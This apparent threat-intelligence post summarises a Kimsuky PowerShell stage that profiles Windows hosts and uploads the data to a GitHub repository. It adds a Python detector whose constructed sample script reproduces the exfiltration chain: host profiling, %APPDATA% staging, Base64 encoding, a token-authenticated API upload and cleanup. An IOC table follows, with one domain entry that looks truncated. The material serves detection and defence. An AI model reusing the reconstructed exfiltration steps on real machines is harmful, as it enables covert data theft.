Malware created by North Korea's Kimsuky - ofx.txt (2025.6.11)

2025-09-16 Sakai Malware Created by North Korean Kimsuky - ofx.txt (2025.6.11)

https://wezard4u.tistory.com/429598


The excerpt attributes the ofx.txt script stage, found in the “Update Schedule_INVITATION - 250625 UNC Ambassador's Roundtable” archive, to Kimsuky activity using a diplomatic-themed lure. The PowerShell collects host profiling data: the first network adapter's IP address, a timestamp, the last boot time, OS and system details, a process listing, and potentially antivirus product information. It writes the collected data under %APPDATA% with an IP-and-time-based filename, Base64-encodes the file, and uploads it to the landjhon/world GitHub repository through the GitHub Contents API. The script uses light string-splitting obfuscation and a hard-coded GitHub personal access token, and deletes the local artifact after upload, a pattern of SaaS-based data exfiltration followed by cleanup.
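As an added defender-side example (not code from the original post or the referenced blog), the following Python scans a PowerShell script-block log entry for the behaviour chain summarised above: split-string obfuscation is collapsed first, then the GitHub Contents API endpoint, a hard-coded `ghp_` token, Base64 encoding, host-profiling cmdlets, %APPDATA% staging and cleanup are matched, and an alert fires only on the combination. The sample log body is constructed for illustration: the cmdlet names are assumptions about what such a script would call, not quoted from ofx.txt, and the token is a placeholder.

```python
import re
# Constructed sample of a PowerShell script-block log body (not the real ofx.txt):
# fragments mimicking the behaviours the report describes, including the light
# string-splitting of the API host. $name and $body are deliberately undefined.
SAMPLE_SCRIPT_BLOCK = r"""
$ip = (Get-NetIPAddress -AddressFamily IPv4)[0].IPAddress
$os = Get-WmiObject Win32_OperatingSystem
$procs = Get-Process | Select-Object Name, Id
$file = "$env:APPDATA\$ip-$(Get-Date -Format yyyyMMddHHmmss).txt"
$b64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes($file))
$uri = 'https://api.gi' + 'thub.com/repos/' + 'landjhon/world/contents/' + $name
$hdr = @{ Authorization = 'token ghp_PLACEHOLDERPLACEHOLDER0000000000' }
Invoke-RestMethod -Uri $uri -Method Put -Headers $hdr -Body $body
Remove-Item $file -Force
"""

# One regex per link of the chain the report describes.
SIGNATURES = {
    "github_contents_api": r"api\.github\.com/repos/[^/\s'\"]+/[^/\s'\"]+/contents/",
    "hardcoded_github_token": r"\bghp_[A-Za-z0-9]{20,}\b",
    "base64_encode": r"\[Convert\]::ToBase64String",
    "http_put": r"-Method\s+Put\b",
    "host_profiling": r"Get-NetIPAddress|Win32_OperatingSystem|Get-Process|Get-ComputerInfo",
    "appdata_staging": r"\$env:APPDATA",
    "artifact_cleanup": r"Remove-Item\b",
}
_CONCAT = re.compile(r"(['\"])([^'\"]*)\1\s*\+\s*(['\"])([^'\"]*)\3")

def normalize(script):
    """Collapse 'a' + 'b' concatenations to a fixpoint so a split host name matches whole."""
    prev = None
    while prev != script:
        prev = script
        script = _CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", script)
    return script

def scan_script_block(script):
    """Return {signature_name: sorted unique matches} for the de-obfuscated script."""
    text, hits = normalize(script), {}
    for name, pattern in SIGNATURES.items():
        found = re.findall(pattern, text, flags=re.IGNORECASE)
        if found:
            hits[name] = sorted(set(found))
    return hits

def is_suspected_saas_exfil(script):
    """Alert only on the combination (Contents API PUT + encoding/token + >=4 links)."""
    hits = scan_script_block(script)
    upload = "github_contents_api" in hits and "http_put" in hits
    return upload and len(hits) >= 4 and ("base64_encode" in hits or "hardcoded_github_token" in hits)
```

A lone GitHub API call (for example fetching a release) does not trip the alert; the detection keys on the write-to-Contents-API step combined with the staging and credential links.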

Indicators of Compromise

Type    Value                              First Seen  Last Seen
IPv4    45.32.133.19                       2025-09-08  2025-09-17
HASH    6bb053ca180dcbc3e1d37b2e6ec1cdf1   2025-09-16  2025-09-16
HASH    59ed600b44adc7cb5ac2156e4ff683a…   2025-09-16  2025-09-16
HASH    932f33336632a388c2d2cfb0560c773…   2025-09-16  2025-09-16
DOMAIN  ub.com                             2025-09-16  2025-09-16
